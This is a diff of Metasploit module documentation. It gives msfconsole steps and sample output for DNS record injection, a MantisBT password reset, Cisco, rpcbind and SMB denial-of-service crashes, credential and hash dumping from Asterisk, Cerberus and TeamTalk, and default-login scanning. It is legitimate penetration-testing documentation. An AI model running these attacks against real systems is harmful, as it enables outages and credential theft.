pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
if [[ -n "$MSF_BUILD" ]]; then
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build
fi
docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@"

View File

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo) The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output ## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular) ### 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > auxiliary/admin/chromecast/chromecast_youtube msf > auxiliary/admin/chromecast/chromecast_youtube

View File

@ -0,0 +1,30 @@
# Dynamic DNS Update Injection
`dyn_dns_update` module allows adding or deleting DNS records
on a DNS server that allows unrestricted dynamic updates.
## Vulnerable Application
Any DNS server that allows dynamic update for none trusted source IPs.
## Verification Steps
1. Start msfconsole
2. Do: ```auxiliary/scanner/dns/dyn_dns_update```
3. Do: ```set DOMAIN [IP]```
4. Do: ```set NS [IP]```
5. Do: ```set INJECTDOMAIN [IP]```
6. Do: ```set INJECTIP [IP]```
7. Do: ```set ACTION ADD```
8. Do: ```run```
## Actions
There are two kind of actions the module can run:
1. **ADD** - Add a new record. [Default]
2. **DEL** - Delete an existing record.
## Targeting Information
WPAD may not work with Windows 2008+ targets due to a DNS block list: https://technet.microsoft.com/en-us/library/cc995261.aspx

View File

@ -0,0 +1,30 @@
## Vulnerable Application
MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
on
[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password
was successfully changed.
## Scenarios
```
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set rport 8082
rport => 8082
msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > run
[+] Password successfully changed to 'ndOQTmhQ'.
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_password_reset) >
```

View File

@ -27,7 +27,7 @@
7. You should get credentials 7. You should get credentials
## Sample Output ## Scenarios
``` ```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin' [+] 172.16.191.166:8080 Authenticated successfully as 'admin'

View File

@ -28,13 +28,14 @@ Bluetooth HWBridge adapters, depending on the Operating System, may take several
The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326) The following steps were [recorded during the testing of this module](https://github.com/rapid7/metasploit-framework/pull/7795#issuecomment-274302326)
on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling). on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali Linux 2016.2 (rolling).
1. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands) 1. Most Bluetooth HWBridge adapters, speak serial. So you will need to get the ruby gem "serialport": ```gem install serialport```
2. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd` 2. Ensure no locks on the Bluetooth device via: `rfkill list` (and subsequent `unblock` commands)
3. Start bluetoothctl: `bluetoothctl` 3. Make sure Bluetooth service is started: `/etc/init.d/bluetooth start`, or `bluetoothd`
4. Turn on scanning: `scan on` 4. Start bluetoothctl: `bluetoothctl`
5. Turn on agent: `agent on` 5. Turn on scanning: `scan on`
6. Make sure we can see OBDII: `devices` 6. Turn on agent: `agent on`
7. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA` 7. Make sure we can see OBDII: `devices`
8. Attempt to pair: `[bluetooth]# pair 00:0D:18:AA:AA:AA`
``` ```
Attempting to pair with 00:0D:18:AA:AA:AA Attempting to pair with 00:0D:18:AA:AA:AA

View File

@ -0,0 +1,161 @@
## Vulnerable Application
1. Obtain a Cisco switch of any model indicated here that is running vulnerable firmware: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp. Note that the vulnerability spans many years. We tested two firmwares 10 years apart and were able to verify exploitability.
2. Enable telnet access and verify that you can reach the switch normally via that mode.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
3. Do: `set RHOST 192.168.1.10`
4. Do: ```run```
5. The switch should restart and display crash information on the console.
## Scenarios
```
Switch#sh ver
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02C00000
ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
Switch uptime is 1 hour, 28 minutes
System returned to ROM by power-on
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
Image text-base: 0x01000000, data-base: 0x02F00000
[...]
Election Complete
Switch 2 booting as Master
Waiting for Port download...Complete
[...]
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
Processor board ID CAT1017Z2Z2
Last reset from power-on
1 Virtual Ethernet interface
48 FastEthernet interfaces
4 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.
[...]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
Switch#
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
-Traceback= 41414140
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
Buffered messages:
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:50: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
Queued messages:
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
Instruction Access Exception (0x0400)!
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
Stack trace:
PC = 0x41414140, SP = 0x02DDEE80
Frame 00: SP = 0x41414141 PC = 0x41414141
Switch uptime is 37 minutes, 22 seconds
[... rebooting ... ]
Switch Ports Model SW Version SW Image
------ ----- ----- ---------- ----------
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
Failed to generate persistent self-signed certificate.
Secure server will use temporary self-signed certificate.
Press RETURN to get started!
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
Switch>
Switch>as changed to state DOWN
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
00:00:32: %SYS-5-RESTART: System restarted --
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 20-Jul-07 01:58 by nachen
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
Switch>
Switch>
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
00:01:32: %PLATFORM-1-CRASHED:
```

View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```

View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_loris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```

View File

@ -24,7 +24,7 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess
## Verification Steps ## Verification Steps
1. Start msfconsole 1. Start msfconsole
2. ```use auxiliary/gahter/advantech_webaccess_creds``` 2. ```use auxiliary/gather/advantech_webaccess_creds```
3. ```set WEBACCESSUSER [USER]``` 3. ```set WEBACCESSUSER [USER]```
4. ```set WEBACCESSPASS [PASS]``` 4. ```set WEBACCESSPASS [PASS]```
5. ```run``` 5. ```run```

View File

@ -0,0 +1,62 @@
## Description
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
Valid manager credentials are required.
## Vulnerable Application
[Asterisk](http://www.asterisk.org/get-started/features) offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
This module has been tested successfully on:
* Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
* Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
The following software comes with Asterisk preinstalled and can be used for testing purposes:
* [FreePBX](https://www.freepbx.org/downloads/)
* [VulnVoIP](https://www.rebootuser.com/?p=1069)
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the `permit` directive (or is specifically denied in the `deny` directive) in the Asterisk manager configuration file `/etc/asterisk/manager.conf`.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/asterisk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `5038`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `amp111`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users
Asterisk User Credentials
=========================
Username Secret Type
-------- ------ ----
100 sip
103 bbf5d449753391a sip
104 273db6cd9ca402f53354 iax2
105 secret password sip
106 "_" ;) iax2
107 123456789 sip
108 ~!@#$%^&*()_+{} sip
109 antidisestablishment iax2
123 y2u.be/VOaZbaPzdsk iax2
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed
```

View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7` 5: Do: `set CENSYS_DORK rapid7`
6: Do: `run` 6: Do: `run`
## Sample Output ## Scenarios
#### Certificates Search ### Certificates Search
``` ```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7 msf auxiliary(censys_search) > set CENSYS_DORK rapid7

View File

@ -0,0 +1,82 @@
## Description
This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.
## Vulnerable Application
This module has been verified against the following Cerberus Helpdesk versions:
1. Version 4.2.3 Stable (Build 925)
2. Version 5.4.4
However it may also work up to, but not including, version 6.7
Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
* of note, 5.4.4 has to be installed on a PRE php7 environment.
## Verification Steps
1. Start msfconsole
2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
3. ```set rhosts [rhosts]```
4. ```run```
## Scenarios
### 4.2.3 using zend (not verbose)
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers
[+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
[+] Found: example:112302c209fe8d73f502c132a3da2b1c
[+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
admin aaa34a6111abf0bd1b1c4d7cd7ebb37b
example 112302c209fe8d73f502c132a3da2b1c
foobar 0d108d09e5bbe40aade3de5c81e9e9c7
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### 5.4.4 using devblocks
```
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
rhosts => 192.168.2.45
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
targeturi => /cerb5/
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
verbose => true
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
[+] Found: bar@none.com:37b51d194a7513e45b56f6524f2d51f2
[+] Found: foo@none.com:acbd18db4cc2f85cedef654fccc4a4d8
[+] Found: mike@shorebreaksecurity.com:18126e7bd3f84b3f3e4df094def5b7de
Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
bar@none.com 37b51d194a7513e45b56f6524f2d51f2
foo@none.com acbd18db4cc2f85cedef654fccc4a4d8
admin@example.com 18126e7bd3f84b3f3e4df094def5b7de
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,87 @@
This module downloads PDF files and extracts the author's name from the document metadata.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/http_pdf_authors`
3. Do: `set URL [URL]`
4. Do: `run`
## Options
**URL**
The URL of a PDF to analyse.
**URL_LIST**
File containing a list of PDF URLs to analyze.
**OUTFILE**
File to store extracted author names.
## Scenarios
### URL
```
msf auxiliary(http_pdf_authors) > set url http://127.0.0.1/test4.pdf
url => http://127.0.0.1/test4.pdf
msf auxiliary(http_pdf_authors) > run
[*] Processing 1 URLs...
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 100.00% done (1/1 files)
[+] Found 1 authors: Administrator
[*] Auxiliary module execution completed
```
### URL_LIST with OUTFILE
```
msf auxiliary(http_pdf_authors) > set outfile /root/output
outfile => /root/output
msf auxiliary(http_pdf_authors) > set url_list /root/urls
url_list => /root/urls
msf auxiliary(http_pdf_authors) > run
[*] Processing 8 URLs...
[*] Downloading 'http://127.0.0.1:80/test.pdf'
[*] HTTP 200 -- Downloaded PDF (89283 bytes)
[*] 12.50% done (1/8 files)
[*] Downloading 'http://127.0.0.1/test2.pdf'
[*] HTTP 200 -- Downloaded PDF (636661 bytes)
[+] PDF Author: sqlmap developers
[*] 25.00% done (2/8 files)
[*] Downloading 'http://127.0.0.1/test3.pdf'
[*] HTTP 200 -- Downloaded PDF (167478 bytes)
[+] PDF Author: Evil1
[*] 37.50% done (3/8 files)
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 50.00% done (4/8 files)
[*] Downloading 'http://127.0.0.1/test5.pdf'
[*] HTTP 200 -- Downloaded PDF (34312 bytes)
[+] PDF Author: ekama
[*] 62.50% done (5/8 files)
[*] Downloading 'http://127.0.0.1/doesnotexist.pdf'
[*] HTTP 404 -- Downloaded PDF (289 bytes)
[-] Could not parse PDF: PDF is malformed
[*] 75.00% done (6/8 files)
[*] Downloading 'https://127.0.0.1/test.pdf'
[-] Connection failed: Failed to open TCP connection to 127.0.0.1:443 (Connection refused - connect(2) for "127.0.0.1" port 443)
[*] Downloading 'https://127.0.0.1:80/test.pdf'
[-] Connection failed: SSL_connect returned=1 errno=0 state=unknown state: unknown protocol
[+] Found 4 authors: sqlmap developers, Evil1, Administrator, ekama
[*] Writing data to /root/output...
[*] Auxiliary module execution completed
```

View File

@ -0,0 +1,53 @@
## Description
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
## Vulnerable Application
[TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/teamtalk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `10333`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `admin`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users
TeamTalk User Credentials
=========================
Username Password Type
-------- -------- ----
debbie 1234567890 1
murphy 934txs 2
quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2
sparks password 2
stormy 1
[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed
```

View File

@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### On vsFTPd 3.0.3 on Kali ### vsFTPd 3.0.3 on Kali
``` ```
msf > use auxiliary/scanner/ftp/anonymous msf > use auxiliary/scanner/ftp/anonymous

View File

@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf> use auxiliary/scanner/ftp/ftp_login msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org

View File

@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### On vsFTPd 3.0.3 on Kali ### vsFTPd 3.0.3 on Kali
``` ```
msf > use auxiliary/scanner/ftp/ftp_version msf > use auxiliary/scanner/ftp/ftp_version

View File

@ -1,4 +1,13 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts:
1. root/root
2. admin/1
3. alg/1
4. user/1
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps ## Verification Steps
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump msf > use auxiliary/scanner/http/binom3_login_config_pass_dump

View File

@ -0,0 +1,59 @@
## Description
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
## Vulnerable Application
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
[Inedo website](http://inedo.com/)
## Verification Steps
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: Set credentials
5. Do: ```run```
6. You should see the module attempting to log in.
## Scenarios
### Attempt to login with the default credentials.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
### Brute force with credentials from file.
```
msf > use auxiliary/scanner/http/buildmaster_login
